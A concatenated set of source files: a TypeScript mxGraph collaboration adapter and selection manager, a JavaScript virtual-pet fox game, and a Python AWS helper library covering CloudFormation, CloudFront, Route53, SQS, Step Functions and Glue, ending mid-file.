          const parent = parentId === null ? null : this._mxGraph.model.cells[parentId];
          this._mxCell.setParent(parent);
          this._mxGraph.view.refresh();
          this._eventCallback("onCellChanged", {cell: this._mxCell});
          break;
        case "target":
          const targetId = e.value.value();
          const target = targetId === null ? null : this._mxGraph.model.cells[targetId];
          this._mxCell.setTerminal(target, false);
          this._mxGraph.view.refresh();
          this._eventCallback("onCellChanged", {cell: this._mxCell});
          break;
        case "source":
          const sourceId = e.value.value();
          const source = sourceId === null ? null : this._mxGraph.model.cells[sourceId];
          this._mxCell.setTerminal(source, true);
          this._mxGraph.view.refresh();
          this._eventCallback("onCellChanged", {cell: this._mxCell});
          break;
        case "style":
          // A remote peer replaced the whole style object; re-subscribe.
          this._initStyle();
          const newStyle = Deserializer.deserializeStyle(this._rtStyle.value() as IStyleData);
          this._mxCell.setStyle(newStyle);
          this._mxGraph.view.refresh();
          this._eventCallback("onCellChanged", {cell: this._mxCell});
          break;
        case "value":
          const value = e.value.value();
          this._mxCell.setValue(value);
          this._mxGraph.view.refresh();
          this._eventCallback("onCellChanged", {cell: this._mxCell});
          break;
        case "visible":
          const visible = e.value.value();
          this._mxCell.setVisible(visible);
          this._mxGraph.view.refresh();
          this._eventCallback("onCellChanged", {cell: this._mxCell});
          break;
        case "collapsed":
          const collapsed = e.value.value();
          this._mxCell.setCollapsed(collapsed);
          this._mxGraph.view.refresh();
          this._eventCallback("onCellChanged", {cell: this._mxCell});
          break;
      }
    });
  }

  /**
   * Subscribes to remote geometry replacement, if this cell has geometry.
   * Returns the real-time geometry object, or null for geometry-less cells.
   */
  private _initRtGeometry(): RealTimeObject | null {
    if (this._rtCell.hasKey("geometry")) {
      const rtGeometry = this._rtCell.get("geometry") as RealTimeObject;
      rtGeometry.on("value", () => {
        const geometry = Deserializer.deserializeGeometry(rtGeometry.value() as IGeometry);
        this._mxCell.setGeometry(geometry);
        this._mxGraph.view.refresh();
        setTimeout(() => {
          this._eventCallback("onCellChanged", {cell: this._mxCell});
        }, 0);
      });
      return rtGeometry;
    } else {
      return null;
    }
  }

  /** Subscribes to remote fine-grained style edits (classes + key/value styles). */
  private _initStyle() {
    if (this._rtCell.hasKey("style")) {
      this._rtStyle = this._rtCell.get("style") as RealTimeObject;
      this._rtStyles = this._rtStyle.get("styles") as RealTimeObject;
      this._rtStyles.on("set", (e: ObjectSetEvent) => {
        this._mutateStyle((cellStyle: any) => {
          const styleName = e.key;
          cellStyle.styles[styleName] = e.value.value();
        });
      });
      this._rtStyles.on("remove", (e: ObjectRemoveEvent) => {
        this._mutateStyle((cellStyle: any) => {
          const styleName = e.key;
          delete cellStyle.styles[styleName];
        });
      });
      this._rtClasses = this._rtStyle.get("classes") as RealTimeArray;
      this._rtClasses.on("insert", (e: ArrayInsertEvent) => {
        this._mutateStyle((cellStyle: any) => {
          const className = e.value.value();
          cellStyle.classes.push(className);
        });
      });
      this._rtClasses.on("remove", (e: ArrayRemoveEvent) => {
        this._mutateStyle((cellStyle: any) => {
          const className = e.oldValue.value();
          const index = cellStyle.classes.indexOf(className);
          cellStyle.classes.splice(index, 1);
        });
      });
    }
  }

  /**
   * Round-trips the cell's style through its structured form, applies
   * `mutate`, and re-renders the cell with the result.
   */
  private _mutateStyle(mutate: (current: any) => void) {
    const cellStyle = Serializer.serializeStyle(this._mxCell.style);
    mutate(cellStyle);
    const newStyle = Deserializer.deserializeStyle(cellStyle);
    this._mxCell.setStyle(newStyle);
    // Drop the cached view state so the new style is actually re-rendered.
    this._mxGraph.view.removeState(this._mxCell);
    this._mxGraph.view.refresh();
    this._eventCallback("onCellChanged", {cell: this._mxCell});
  }
}
<file_sep>import {
  Activity,
  ActivityParticipant,
  ActivitySessionJoinedEvent,
  ActivitySessionLeftEvent,
  ActivityStateSetEvent
} from "@convergence/convergence";
import {mxCell, mxCellHighlight, mxEvent, mxGraph, mxSelectionCellsHandler} from "mxgraph";
import {ActivityColorManager} from "./ActivityColorManager";
import {MxGraphAdapter} from "./MxGraphAdapter";

/** Highlight shapes for one remote session, keyed by cell id. */
interface IRemoteSelection {
  cells: { [key: string]: mxCellHighlight };
}

/**
 * Shares the local mxGraph selection through Convergence activity state and
 * renders remote participants' selections as colored cell highlights.
 */
export class SelectionManager {
  private static readonly _SELECTION_KEY = "selection";

  private readonly _mxGraph: mxGraph;
  private readonly _activity: Activity;
  private readonly _colorManager: ActivityColorManager;
  private readonly _remoteSelectionsBySessionId: Map<string, IRemoteSelection>;
  private readonly _selectionHandler: mxSelectionCellsHandler;

  constructor(
    graph: mxGraph,
    activity: Activity,
    colorManager: ActivityColorManager,
    modelAdapter: MxGraphAdapter) {
    this._mxGraph = graph;
    this._activity = activity;
    this._colorManager = colorManager;
    modelAdapter.addListener({
      onCellsRemoved: (evt: any) => {
        evt.cells.forEach((cell: mxCell) => {
          this._cellRemoved(cell);
        });
      },
      onCellChanged: (evt: any) => this._cellUpdated(evt.cell)
    });
    this._remoteSelectionsBySessionId = new Map();
    this._selectionHandler = this._mxGraph.selectionCellsHandler;
    this._selectionHandler.addListener(mxEvent.ADD, () => {
      this._setSelection();
    });
    this._selectionHandler.addListener(mxEvent.REMOVE, () => {
      this._setSelection();
    });
    this._activity.on("session_joined", (e: ActivitySessionJoinedEvent) => {
      this._addRemoteSelection(e.participant);
    });
    this._activity.on("session_left", (e: ActivitySessionLeftEvent) => {
      this._updateRemoteSelection(e.sessionId, []);
      this._remoteSelectionsBySessionId.delete(e.sessionId);
    });
    this._activity.on("state_set", (e: ActivityStateSetEvent) => {
      const {key, value, sessionId, local} = e;
      if (!local && key === SelectionManager._SELECTION_KEY) {
        this._updateRemoteSelection(sessionId, value);
      }
    });
    this._activity.participants().forEach((participant: ActivityParticipant) => {
      this._addRemoteSelection(participant);
    });
  }

  /** Publishes the current local selection (as cell ids) to the activity. */
  private _setSelection(): void {
    const selectedCells = this._mxGraph.getSelectionCells();
    const cellIds = selectedCells.map((c: mxCell) => c.id);
    this._activity.setState(SelectionManager._SELECTION_KEY, cellIds);
  }

  private _addRemoteSelection(participant: ActivityParticipant): void {
    if (!participant.local) {
      const selection = participant.state.get(SelectionManager._SELECTION_KEY) || [];
      this._updateRemoteSelection(participant.sessionId, selection);
    }
  }

  /** Re-draws local handles and remote highlights after a cell changes. */
  private _cellUpdated(cell: mxCell): void {
    const handler = this._mxGraph.selectionCellsHandler.getHandler(cell);
    if (handler) {
      handler.redraw();
    }
    this._remoteSelectionsBySessionId.forEach((remoteSelection: IRemoteSelection) => {
      const highlighter = remoteSelection.cells[cell.id];
      if (highlighter) {
        const cellState = this._mxGraph.view.getState(cell);
        highlighter.highlight(null);
        highlighter.highlight(cellState);
      }
    });
  }

  private _cellRemoved(cell: mxCell): void {
    this._remoteSelectionsBySessionId.forEach((remoteSelection: IRemoteSelection) => {
      const cellSelection = remoteSelection.cells[cell.id];
      if (cellSelection) {
        cellSelection.destroy();
        delete remoteSelection.cells[cell.id];
      }
    });
  }

  /** Replaces a session's highlights with highlights for `cellIds`. */
  private _updateRemoteSelection(sessionId: string, cellIds: string[]): void {
    const currentSelection = this._remoteSelectionsBySessionId.get(sessionId);
    if (currentSelection) {
      Object.keys(currentSelection.cells).forEach((cellId: string) => {
        const shape = currentSelection.cells[cellId];
        shape.destroy();
      });
      this._remoteSelectionsBySessionId.delete(sessionId);
    }
    if (cellIds && cellIds.length > 0) {
      const selection: IRemoteSelection = {
        cells: {}
      };
      cellIds.forEach((cellId: string) => {
        const cell = this._mxGraph.model.cells[cellId];
        // FIX: a missing id yields undefined (not null), so the former
        // `cell !== null` check let undefined through to view.getState.
        if (cell) {
          const color = this._colorManager.color(sessionId);
          const highlighter = new mxCellHighlight(this._mxGraph, color, 3, false);
          const cellState = this._mxGraph.view.getState(cell);
          highlighter.highlight(cellState);
          selection.cells[cellId] = highlighter;
        }
      });
      this._remoteSelectionsBySessionId.set(sessionId, selection);
    }
  }
}
dde56a4277b2eb0694266a504d3a1dbb8899e2eb
[ "Markdown", "TypeScript" ]
12
TypeScript
convergencelabs/mxgraph-adapter
8aed5bb2e1f0de2ac9098836f6227358f31a18c0
b2568087e49e57c1c40b9e92e35b685a5150cb2d
refs/heads/main
<repo_name>nisimdor/petGame<file_sep>/init.js // constants const TICK_RATE = 2000; const RAIN_CHANCE = 0.2; const ICONS = ["fish", "poop", "weather"]; const SCENES = ["day", "rain"]; const DAY_LENGTH = 60; const NIGHT_LENGTH = 4; const getNextHungerTime = (clock) => Math.floor(Math.random() * 3) + 4 + clock; const getNextDieTime = (clock) => Math.floor(Math.random() * 2) + 3 + clock; const getNextPoopTime = (clock) => Math.floor(Math.random() * 3) + 5 + clock; // buttons.js const toggleHighlighted = (icon, show) => { document .querySelector(`.${ICONS[icon]}-icon`) .classList.toggle("highlighted", show); }; function initButtons(handleUserAction) { let selectedIcon = 0; const updateIcon = (selected, reducer) => { toggleHighlighted(selected, false); selected = reducer(selected) % ICONS.length; toggleHighlighted(selected, true); return selected; }; function buttonClick({ target }) { if (target.classList.contains("left-btn")) { selectedIcon = updateIcon(selectedIcon, (x) => x + ICONS.length - 1); } else if (target.classList.contains("right-btn")) { selectedIcon = updateIcon(selectedIcon, (x) => x + 1); } else { handleUserAction(ICONS[selectedIcon]); } } document.querySelector(".buttons").addEventListener("click", buttonClick); } //ui const modFox = (state) => (document.querySelector(".fox").className = `fox fox-${state}`); const modScene = (state) => (document.querySelector(".game").className = `game ${state}`); const tooglePoopBag = (show) => document.querySelector(".poop-bag").classList.toggle("hidden", !show); const writeModal = (text = "") => { document.querySelector( ".modal" ).innerHTML = `<div class="modal-inner">${text}</div>`; }; //game state const Events = { FISH: "fish", POOP: "poop", WEATHER: "weather", // Time Based Events WAKE: "wake", SLEEP: "sleep", DIE: "die", START_POOP: "start_poop", START_CELEBRATE: "start_celebrate", END_CELEBRATE: "end_celebrate", HUNGRY: "hungry", }; const changeSettings = (fox, scene) => { modFox(fox); // scene is optional if 
(scene) { modScene(scene); } }; //#region tick events const startGame = (state) => { state.times[Events.WAKE] = state.clock + 3; changeSettings("egg", "day"); writeModal(); }; const wake = (state) => { state.times[Events.WAKE] = -1; state.scene = Math.random() > RAIN_CHANCE ? 0 : 1; changeSettings("idling", SCENES[state.scene]); state.times[Events.SLEEP] = state.clock + DAY_LENGTH; state.times[Events.HUNGRY] = getNextHungerTime(state.clock); }; const clearTimes = (state) => { Object.keys(state.times).forEach((keyTime) => (state.times[keyTime] = -1)); }; const sleep = (state) => { changeSettings("sleep", "night"); clearTimes(state); state.times[Events.WAKE] = state.clock + NIGHT_LENGTH; }; const hungry = (state) => { state.times[Events.DIE] = getNextDieTime(state.clock); state.times[Events.HUNGRY] = -1; changeSettings("hungry"); }; const die = (state) => { changeSettings("dead", "dead"); clearTimes(state); writeModal("The fox died :( <br/> Press the middle button to start"); }; const changeWeather = (state) => { state.scene = (state.scene + 1) % SCENES.length; modScene(SCENES[state.scene]); determineFoxState(state); }; const cleanPoop = (state) => { state.times[Events.DIE] = -1; tooglePoopBag(true); state.times[Events.HUNGRY] = getNextHungerTime(state.clock); }; const poop = (state) => { state.times[Events.POOP] = -1; state.times[Events.DIE] = getNextDieTime(state.clock); changeSettings("pooping"); }; const feed = (state) => { state.times[Events.DIE] = -1; state.times[Events.START_CELEBRATE] = state.clock + 2; changeSettings("eating"); state.times[Events.START_POOP] = getNextPoopTime(state.clock); }; const celebrate = (state) => { changeSettings("celebrate"); state.times[Events.START_CELEBRATE] = -1; state.times[Events.END_CELEBRATE] = state.clock + 2; }; const endCelebrate = (state) => { state.times[Events.END_CELEBRATE] = -1; tooglePoopBag(false); }; const determineFoxState = (state) => { console.log(state.current); if (state.current === "idling") { if 
(SCENES[state.scene] === "rain") { changeSettings("rain"); } else { changeSettings("idling"); } } }; //#endregion const gameState = { current: "init", clock: 1, times: { [Events.START_CELEBRATE]: -1, [Events.END_CELEBRATE]: -1, [Events.WAKE]: -1, [Events.SLEEP]: -1, [Events.DIE]: -1, [Events.HUNGRY]: -1, [Events.START_POOP]: -1, }, states: { init: { "*": { target: "hatching", actions: [startGame], }, }, hatching: { [Events.WAKE]: { target: "idling", actions: [wake], }, }, idling: { [Events.SLEEP]: { target: "sleeping", actions: [sleep], }, [Events.HUNGRY]: { target: "hungry", actions: [hungry], }, [Events.START_POOP]: { target: "pooping", actions: [poop], }, [Events.WEATHER]: { actions: [changeWeather], }, [Events.DIE]: { target: "dead", actions: [die], }, }, hungry: { [Events.FISH]: { target: "feeding", actions: [feed], }, [Events.WEATHER]: { actions: [changeWeather], }, [Events.DIE]: { target: "dead", actions: [die], }, }, feeding: { [Events.START_CELEBRATE]: { target: "celebrating", actions: [celebrate], }, [Events.WEATHER]: { actions: [changeWeather], }, }, celebrating: { [Events.END_CELEBRATE]: { target: "idling", actions: [endCelebrate, determineFoxState], }, [Events.WEATHER]: { actions: [changeWeather], }, }, pooping: { [Events.POOP]: { target: "celebrating", actions: [cleanPoop, celebrate], }, [Events.WEATHER]: { actions: [changeWeather], }, [Events.DIE]: { target: "dead", actions: [die], }, }, sleeping: { [Events.WAKE]: { target: "idling", actions: [wake], }, [Events.WEATHER]: { actions: [changeWeather], }, }, dead: { "*": { target: "hatching", actions: [startGame], }, }, }, tick() { this.clock++; let currentClock = this.clock; let event = Object.keys(this.times).find( (key) => this.times[key] !== -1 && this.times[key] <= currentClock ); console.log(currentClock, event, this.times); if (event) { handleUserAction(event); } return this.clock; }, }; function handleUserAction(event) { let currentState = gameState.states[gameState.current]; if (currentState) { 
// if we have a wildcard event or a defined event let handler = currentState[event] || currentState["*"]; if (handler) { gameState.current = handler.target || gameState.current; (handler.actions || []).forEach((f) => f(gameState)); } } } async function init() { console.log("starting game"); initButtons(handleUserAction); let nextTimeToTick = Date.now(); function nextAminationFrame() { const now = Date.now(); if (nextTimeToTick <= now) { gameState.tick(); nextTimeToTick = now + TICK_RATE; } requestAnimationFrame(nextAminationFrame); } requestAnimationFrame(nextAminationFrame); } init();
ab553d8892001d5e11bfa4df7be4772fe3e1c724
[ "JavaScript" ]
1
JavaScript
nisimdor/petGame
48e32f818d4fbe09e329a0c0fcb17eeda4628b3e
7dd834ea411a48253602b426e6d3cabf049ab15a
refs/heads/master
<file_sep>import time from madeira import session, sts from madeira_utils import loggers class StepFunctions: def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self._sts = sts.Sts(logger=logger, profile_name=None, region=None) self.step_functions_client = self._session.session.client('stepfunctions') def create_state_machine(self, name, definition, role_arn, attempt=1): if attempt > 10: self._logger.error('Exhausted %s attempts to deploy state machine: %s', attempt, name) return False self._logger.debug('Attempt: %s to deploy state machine: %s', attempt, name) try: result = self.step_functions_client.create_state_machine(name=name, definition=definition, roleArn=role_arn) self._logger.info('Created state machine: %s', name) return result except self.step_functions_client.exceptions.StateMachineDeleting: self._logger.warning('State machine: %s is still in the process of deleting', name) self._logger.info('Waiting a while for that process to finish') time.sleep(10) return self.create_state_machine(name, definition, role_arn, attempt=attempt+1) def create_or_update_state_machine(self, name, definition, role_arn): try: state_machine_arn = (f'arn:aws:states:{self._session.region}:' f'{self._sts.account_id}:stateMachine:{name}') state_machine = self.step_functions_client.describe_state_machine(stateMachineArn=state_machine_arn) if state_machine['status'] == 'DELETING': return self.create_state_machine(name, definition, role_arn) return self.update_state_machine(state_machine_arn, definition, role_arn) except self.step_functions_client.exceptions.StateMachineDoesNotExist: return self.create_state_machine(name, definition, role_arn) def delete_state_machine(self, arn): self.step_functions_client.delete_state_machine(stateMachineArn=arn) def list_state_machines(self): return 
self.step_functions_client.list_state_machines().get('stateMachines') def wait_for_executions(self, state_machine_arn, wait_interval=60): max_retries = 60 count = 0 while True: count += 1 response = self.step_functions_client.list_executions( stateMachineArn=state_machine_arn, statusFilter='RUNNING') execution_arns = [execution['executionArn'] for execution in response.get('executions')] if execution_arns: if count == max_retries: self._logger.error('Timed out waiting for state machine executions to finish:') for execution_arn in execution_arns: self._logger.error(' %s', execution_arn) return self._logger.info('Waiting %s sec for state machine executions to finish:', wait_interval) for execution_arn in execution_arns: self._logger.info(' %s', execution_arn) time.sleep(wait_interval) else: self._logger.info('State machine executions of %s completed', state_machine_arn) return def update_state_machine(self, state_machine_arn, definition, role_arn): result = self.step_functions_client.update_state_machine( stateMachineArn=state_machine_arn, definition=definition, roleArn=role_arn ) self._logger.info('Updated state machine: %s', state_machine_arn) return result <file_sep>from datetime import datetime import time from madeira import session, s3 from madeira_utils import loggers class CloudFront(object): def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self.cloudfront_client = self._session.session.client('cloudfront') self._s3 = s3.S3(logger=None, profile_name=None, region=None) def get_distribution_by_comment(self, comment): for distro in self.cloudfront_client.list_distributions()['DistributionList']['Items']: if distro['Comment'] == comment: return distro def invalidate_cache(self, distro_id, items=None): if not items: items = ['/*'] self._logger.info('Invalidating items: %s in distro: %s', items, 
distro_id) return self.cloudfront_client.create_invalidation( DistributionId=distro_id, InvalidationBatch={ 'Paths': { 'Quantity': len(items), 'Items': items }, 'CallerReference': str(datetime.utcnow().timestamp()) } )['Invalidation']['Id'] def update_cdn_content(self, cdn_id, bucket, files): changed_files = self._s3.sync_files(bucket, files) for i, changed_file in enumerate(changed_files): if not changed_file.startswith('/'): changed_files[i] = f'/{changed_file}' # invalidate the cloudfront cache if any assets are changed if changed_files: self._logger.info("One or more asset files have changed") invalidation_id = self.invalidate_cache(cdn_id, items=changed_files) self.wait_for_invalidation_completion(cdn_id, invalidation_id) else: self._logger.info("No asset file changes detected; skipping distro cache invalidation") def wait_for_invalidation_completion(self, distro_id, invalidation_id): max_status_checks = 10 status_check_interval = 10 # wait for stack "final" state desired_status = 'Completed' status_check = 0 while status_check < max_status_checks: status_check += 1 # TODO: exception handling status = self.cloudfront_client.get_invalidation( DistributionId=distro_id, Id=invalidation_id)['Invalidation']['Status'] if status == desired_status: self._logger.info('Distro cache invalidation %s complete', invalidation_id) return True self._logger.info('Distro cache invalidation %s status is: %s - waiting', invalidation_id, status) if status_check >= max_status_checks: raise RuntimeError('Timed out waiting for invalidation %s', invalidation_id) time.sleep(status_check_interval) <file_sep>import uuid from madeira import session from madeira_utils import loggers class Route53(object): def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self.r53_client = self._session.session.client('route53') def 
create_hosted_zone(self, dns_domain, caller_reference=None): caller_reference = caller_reference if caller_reference else uuid.uuid4().hex self._logger.debug('Creating hosted zone for DNS domain: %s', dns_domain) return self.r53_client.create_hosted_zone( Name=dns_domain, CallerReference=caller_reference) def delete_hosted_zone_by_name(self, dns_domain): return self.r53_client.delete_hosted_zone(Id=self.get_hosted_zone_id(dns_domain)) def get_hosted_zone(self, hosted_zone_id): return self.r53_client.get_hosted_zone(Id=hosted_zone_id) def get_hosted_zone_id(self, dns_domain): self._logger.debug('Looking up hosted zone ID for domain: %s', dns_domain) for hosted_zone in self.r53_client.list_hosted_zones().get('HostedZones'): # Hosted zones have trailing dots... if hosted_zone['Name'] == f'{dns_domain}': return hosted_zone['Id'] self._logger.debug('No hosted zone found') def get_domain_ns_records(self, hosted_zone_id): hosted_zone = self.get_hosted_zone(hosted_zone_id) return hosted_zone['DelegationSet']['NameServers'] <file_sep>import boto3 from madeira_utils import loggers session_store = {} class Session(object): def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() # re-use an already-instantiated session, if possible profile_key = profile_name if profile_name else 'default_profile' region_key = region if region else 'default_region' session_key = f"{profile_key}:{region_key}" if session_key in session_store: self._logger.debug('Using session: %s from session store', session_key) self.session = session_store[session_key] else: self._logger.debug('Creating new boto3 session') self.session = boto3.Session(profile_name=profile_name, region_name=region) self._logger.debug('Saving session: %s in session store', session_key) session_store[session_key] = self.session # for convenience self.profile_name = self.session.profile_name self.region = self.session.region_name <file_sep>from madeira import 
session from madeira_utils import loggers class SQS(object): def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self.sqs_resource = self._session.session.resource('sqs') def get_queue(self, name): return self.sqs_resource.get_queue_by_name(QueueName=name) def send_message(self, queue_name, message_group_id, message_body, message_attributes=None): return self.get_queue(queue_name).send_message( MessageGroupId=message_group_id, MessageBody=message_body, MessageAttributes=message_attributes) <file_sep>import re import time from madeira import session from madeira_utils import loggers class CloudFormation(object): def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self.cf_client = self._session.session.client('cloudformation') self._max_status_checks = 20 self._status_check_interval = 20 def _wait_for_status(self, stack_name, desired_status, max_status_checks=None, status_check_interval=None): max_status_checks = max_status_checks if max_status_checks else self._max_status_checks status_check_interval = status_check_interval if status_check_interval else self._status_check_interval # wait for stack "final" state status_check = 0 while status_check < max_status_checks: status_check += 1 try: stack = self.cf_client.describe_stacks(StackName=stack_name)['Stacks'][0] except self.cf_client.exceptions.ClientError as e: stack_missing_msg = f'Stack with id {stack_name} does not exist' if stack_missing_msg in str(e) and desired_status == 'DELETE_COMPLETE': return True else: raise if stack['StackStatus'].startswith('ROLLBACK_'): self._logger.error('%s: cloudformation stack cannot be deployed due to status: %s - delete and re-try', stack['StackName'], 
stack['StackStatus']) return False elif stack['StackStatus'] == 'DELETE_FAILED': self._logger.critical('%s: cloudformation stack deletion failed - please investigate', stack['StackName']) return False elif stack['StackStatus'] == desired_status: self._logger.info('%s: cloudformation stack deployment complete', stack['StackName']) return True self._logger.info('%s: cloudformation stack status: %s; waiting', stack['StackName'], stack['StackStatus']) if status_check >= max_status_checks: raise RuntimeError('%s: deployment timed out') time.sleep(status_check_interval) def create_stack(self, stack_name, template_body, params=None, tags=None, termination_protection=True, max_status_checks=None, status_check_interval=None): try: if self.cf_client.describe_stacks(StackName=stack_name).get('Stacks'): self._logger.warning('Stack with name: %s already exists - skipping', stack_name) return False except self.cf_client.exceptions.ClientError as e: if f'Stack with id {stack_name} does not exist' in str(e): self._logger.debug('%s: cloudformation stack does not exist', stack_name) else: raise if not params: params = [] if not tags: tags = [] self._logger.info('%s: requesting creation of stack', stack_name) response = self.cf_client.create_stack( StackName=stack_name, Capabilities=['CAPABILITY_NAMED_IAM'], Parameters=params, TemplateBody=template_body, Tags=tags, EnableTerminationProtection=termination_protection ) stack_arn = response['StackId'] self._logger.debug('%s: cloudformation stack ARN: %s', stack_name, stack_arn) result = self._wait_for_status(stack_name, 'CREATE_COMPLETE', max_status_checks=max_status_checks, status_check_interval=status_check_interval) return stack_arn if result else False def create_or_update_stack(self, stack_name, template_body, params=None, tags=None, termination_protection=True, max_status_checks=None, status_check_interval=None): stack = self.get_stack(stack_name) if stack: if stack['StackStatus'] == 'ROLLBACK_COMPLETE': self._logger.info('%s: 
cleaning up cloudformation stack from failed initial deployment', stack_name) self.delete_stack(stack_name, disable_termination_protection=termination_protection) else: # update the existing stack self._logger.info('%s: cloudformation stack already exists - may need update', stack_name) return self.update_stack(stack_name, template_body, params=params, tags=tags, max_status_checks=max_status_checks, status_check_interval=status_check_interval) # create the stack that does not exist (or was cleaned up) return self.create_stack(stack_name, template_body, params=params, tags=tags, termination_protection=termination_protection, max_status_checks=max_status_checks, status_check_interval=status_check_interval) def create_bucket_using_cf(self, bucket_name, cf_stack_name, cf_template_file, logging_bucket_name, vpc_id=None): with open(cf_template_file, "r") as f: template_body = f.read() params = [ {"ParameterKey": "BucketName", "ParameterValue": bucket_name}, { "ParameterKey": "LoggingBucketName", "ParameterValue": logging_bucket_name, }, ] if vpc_id: params.append({"ParameterKey": "VpcId", "ParameterValue": vpc_id}) self.create_stack(cf_stack_name, template_body, params) def create_or_update_bucket_using_cf( self, bucket_name, cf_stack_name, cf_template_file, logging_bucket_name, vpc_id=None): with open(cf_template_file, "r") as f: template_body = f.read() params = [ {"ParameterKey": "BucketName", "ParameterValue": bucket_name}, { "ParameterKey": "LoggingBucketName", "ParameterValue": logging_bucket_name, }, ] if vpc_id: params.append({"ParameterKey": "VpcId", "ParameterValue": vpc_id}) self.create_or_update_stack(cf_stack_name, template_body, params) def create_bucket_using_cf_custom_params(self, cf_stack_name, cf_template_file, parameters): with open(cf_template_file, "r") as f: template_body = f.read() self.create_stack(cf_stack_name, template_body, params=parameters) def create_or_update_bucket_using_cf_custom_params(self, cf_stack_name, cf_template_file, parameters): 
with open(cf_template_file, "r") as f: template_body = f.read() self.create_or_update_stack( cf_stack_name, template_body, params=parameters ) def delete_stack(self, stack_name, max_status_checks=None, disable_termination_protection=False, status_check_interval=None): max_status_checks = max_status_checks if max_status_checks else self._max_status_checks status_check_interval = status_check_interval if status_check_interval else self._status_check_interval stack = self.get_stack(stack_name) if not stack: self._logger.info('%s: cloudformation stack does not exist', stack_name) return if stack['StackStatus'] in ['DELETE_COMPLETE', 'DELETE_IN_PROGRESS']: self._logger.warning('Skipping stack: %s due to status: %s', stack['StackName'], stack['StackStatus']) return if disable_termination_protection: self._logger.info('Disabling termination protection for %s', stack_name) self.cf_client.update_termination_protection(EnableTerminationProtection=False, StackName=stack_name) self._logger.info('Requesting deletion of stack: %s', stack_name) self.cf_client.delete_stack(StackName=stack_name) return self._wait_for_status(stack_name, 'DELETE_COMPLETE', max_status_checks=max_status_checks, status_check_interval=status_check_interval) @staticmethod def get_filtered_stack_name(stack_name): return re.sub(r'[^0-9a-zA-Z]+', '', stack_name.title()) def get_stack(self, stack_name): try: return self.cf_client.describe_stacks(StackName=stack_name)['Stacks'][0] except self.cf_client.exceptions.ClientError as e: if 'does not exist' in str(e): return else: raise def get_stack_outputs(self, stack_name): stack = self.get_stack(stack_name) return {output['OutputKey']: output['OutputValue'] for output in stack['Outputs']} def get_stacks(self): return self.cf_client.describe_stacks().get('Stacks') def update_stack(self, stack_name, template_body, params=None, tags=None, max_status_checks=None, status_check_interval=None): existing_stack = {} try: existing_stack = 
self.cf_client.describe_stacks(StackName=stack_name).get('Stacks')[0] if (existing_stack['StackStatus'].startswith('DELETE') or existing_stack['StackStatus'].startswith('ROLLBACK')): self._logger.error('Stack: %s has status: %s which is impossible to update', stack_name, existing_stack['StackStatus']) return existing_stack['StackId'] except self.cf_client.exceptions.ClientError as e: if f'Stack with id {stack_name} does not exist' in str(e): self._logger.debug('%s: cloudformation stack does not exist', stack_name) return False params = params if params else [] tags = tags if tags else [] try: self.cf_client.update_stack( StackName=stack_name, Capabilities=['CAPABILITY_NAMED_IAM'], Parameters=params, TemplateBody=template_body, Tags=tags ) self._logger.info('%s: updating stack', stack_name) except self.cf_client.exceptions.ClientError as e: if 'No updates are to be performed' in str(e): self._logger.info('%s: cloudformation stack update not required', stack_name) return existing_stack['StackId'] else: raise result = self._wait_for_status(stack_name, 'UPDATE_COMPLETE', max_status_checks=max_status_checks, status_check_interval=status_check_interval) return existing_stack['StackId'] if result else False <file_sep>#!/usr/bin/env bash set -e echo "cleaning up old builds" rm -rf dist/ build/ ./*.egg-info # requires "wheel" and "twine" python packages python3 setup.py sdist bdist_wheel twine check dist/* twine upload --repository testpypi dist/* twine upload dist/* <file_sep>from madeira import session, kms from madeira_utils import loggers class Glue(object): def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self.glue_client = self._session.session.client('glue') self._kms = kms.Kms(logger=logger, profile_name=profile_name, region=region) def create_database(self, database): try: self._logger.info('Creating glue 
catalog database: %s', database) return self.glue_client.create_database(DatabaseInput={'Name': database}) except self.glue_client.exceptions.AlreadyExistsException: self._logger.warning('Database already exists: %s', database) def create_or_update_job(self, name, role_arn, s3_script_path, description='', glue_version='1.0', max_capacity=16, max_retries=0, timeout_min=2880, worker_count=None, worker_type=None, max_concurrent_runs=8, command_name='glueetl', default_arguments=None, security_configuration=None): # TODO: docstring with explanation of mutually exclusive params job_params = dict( Name=name, Description=description, Role=role_arn, ExecutionProperty={ 'MaxConcurrentRuns': max_concurrent_runs }, Command={ 'Name': command_name, 'ScriptLocation': s3_script_path, 'PythonVersion': '3' }, # TODO: API doc doesn't really specify what to use here... may not be needed for S3-to-S3 ETL. # Connections={ # 'Connections': [ # 'string', # ] # }, MaxRetries=max_retries, Timeout=timeout_min, MaxCapacity=max_capacity, # TODO: API doc doesn't really specify what to use here... may not be needed for S3-to-S3 ETL. 
# SecurityConfiguration='string', # TODO: activate this if/when needed # NotificationProperty={ # 'NotifyDelayAfter': 0 # }, GlueVersion=glue_version ) if default_arguments: job_params['DefaultArguments'] = default_arguments if security_configuration: job_params['SecurityConfiguration'] = security_configuration if worker_type and worker_count: self._logger.warning('Since "max_capacity" is mutually exclusive to the combination of the "worker_type"' 'and "worker_count" arguments, "max_capacity" is being dropped') job_params.update(dict( NumberOfWorkers=worker_count, WorkerType=worker_type )) del(job_params['MaxCapacity']) try: self.glue_client.get_job(JobName=name) self._logger.info('Glue Job: %s already exists; updating it', name) del(job_params['Name']) self.glue_client.update_job(JobName=name, JobUpdate=job_params) except self.glue_client.exceptions.EntityNotFoundException: self._logger.info('Creating Glue Job: %s', name) self.glue_client.create_job(**job_params) return name def create_or_update_table(self, database, name, glue_table): try: self.glue_client.get_table(DatabaseName=database, Name=name) self._logger.info('Updating table: %s', name) self.glue_client.update_table(**glue_table) except self.glue_client.exceptions.EntityNotFoundException: self._logger.info('Creating table: %s', name) self.glue_client.create_table(**glue_table) def delete_database(self, database): try: self._logger.info('Deleting glue database: %s', database) return self.glue_client.delete_database(Name=database) except 